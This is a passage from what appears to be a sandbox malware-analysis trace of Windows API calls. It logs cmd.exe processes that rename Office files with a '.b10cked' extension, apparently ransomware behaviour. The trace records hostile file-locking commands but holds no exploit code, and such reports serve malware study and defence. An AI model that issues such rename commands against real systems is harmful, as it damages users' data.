_String2="SHIFT") returned -6 [0172.530] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.530] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.530] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.530] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.530] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.530] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.531] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.531] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.531] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.532] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.532] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.532] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f1cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f1c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f1c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.533] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.533] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0172.533] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0172.534] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0172.534] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~1.trx")) returned 0x2020 [0172.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.534] SetErrorMode (uMode=0x0) returned 0x0 [0172.534] SetErrorMode (uMode=0x1) returned 0x0 [0172.534] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x14eb54, lpFilePart=0x14eb3c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", lpFilePart=0x14eb3c*="OUTLLI~1.TRX") returned 0x3c [0172.534] SetErrorMode (uMode=0x0) returned 0x1 [0172.534] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.534] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0172.534] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0172.534] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~1.trx")) returned 0x2020 [0172.534] SetErrorMode (uMode=0x0) returned 0x0 [0172.534] SetErrorMode (uMode=0x1) returned 0x0 [0172.534] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x14efd0, lpFilePart=0x14ed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", lpFilePart=0x14ed68*="OUTLLI~1.TRX") returned 0x3c [0172.534] SetErrorMode (uMode=0x0) returned 0x1 
[0172.534] SetErrorMode (uMode=0x0) returned 0x0 [0172.535] SetErrorMode (uMode=0x1) returned 0x0 [0172.535] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f1d8, lpFilePart=0x14ed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x14ed68*="OUTLLIBR.DLL.trx_dll.b10cked") returned 0x4c [0172.535] SetErrorMode (uMode=0x0) returned 0x1 [0172.535] SetLastError (dwErrCode=0x0) [0172.535] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll.b10cked")) returned 0xffffffff [0172.535] GetLastError () returned 0x2 [0172.535] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e6e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e6e4) returned 0x272130 [0172.535] FindNextFileW (in: hFindFile=0x272130, lpFindFileData=0x14e6e4 | out: lpFindFileData=0x14e6e4) returned 0 [0172.535] GetLastError () returned 0x12 [0172.535] FindClose (in: hFindFile=0x272130 | out: hFindFile=0x272130) returned 1 [0172.537] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x271cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271cc0) returned 0x272130 [0172.537] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0172.537] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x14e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0172.537] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll")) returned 0x2020 [0172.537] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.537] FindClose (in: hFindFile=0x272130 | out: hFindFile=0x272130) returned 1 [0172.537] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14e930 | out: _Buffer=" 1") returned 9 [0172.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.537] GetFileType (hFile=0x7) returned 0x2 [0172.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.538] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14e8bc | out: lpMode=0x14e8bc) returned 1 [0172.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14e8f0 | out: lpConsoleScreenBufferInfo=0x14e8f0) returned 1 [0172.538] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.538] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e930 | out: 
lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14e914, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e914*=0x1a) returned 1 [0172.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.539] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.539] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.539] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.539] SetConsoleInputExeNameW () returned 0x1 [0172.539] GetConsoleOutputCP () returned 0x1b5 [0172.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.539] exit (_Code=0) Process: id = "294" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0x838" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22969 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22970 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22971 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22972 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 22973 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22974 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22975 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22976 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22977 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22978 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23477 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23478 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = 
"" Region: id = 23479 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23480 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 23481 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 23482 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23483 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23484 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23485 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23486 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23487 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23488 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23489 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23490 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23491 start_va = 0x440000 end_va = 0x507fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 23492 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23493 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23494 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23495 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23496 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23497 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23498 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 23499 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000620000" filename = "" Region: id = 23500 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 362 os_tid = 0x974 [0172.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8cc | out: lpSystemTimeAsFileTime=0x18f8cc*(dwLowDateTime=0x9c995460, dwHighDateTime=0x1d440a9)) [0172.309] GetCurrentProcessId () returned 0x838 [0172.309] GetCurrentThreadId () returned 0x974 [0172.309] GetTickCount () returned 0x32386 [0172.309] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8c4 | out: lpPerformanceCount=0x18f8c4*=22909835718) returned 1 [0172.310] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.310] __set_app_type (_Type=0x1) [0172.310] __p__fmode () returned 0x76b331f4 [0172.310] __p__commode () returned 0x76b331fc [0172.310] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.310] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.310] GetCurrentThreadId () returned 0x974 [0172.310] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x974) returned 0x38 [0172.310] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.310] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.310] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f85c | out: phkResult=0x18f85c*=0x0) returned 0x2 [0172.311] VirtualQuery (in: lpAddress=0x18f893, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x18f000, 
AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.311] GetConsoleOutputCP () returned 0x1b5 [0172.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.311] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.311] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.312] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.312] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.312] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.312] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.312] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.312] GetEnvironmentStringsW () returned 0x350218* [0172.312] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0172.312] GetEnvironmentStringsW () returned 0x350218* [0172.313] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0172.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0xa8, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegCloseKey (hKey=0x40) returned 0x0 [0172.313] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, 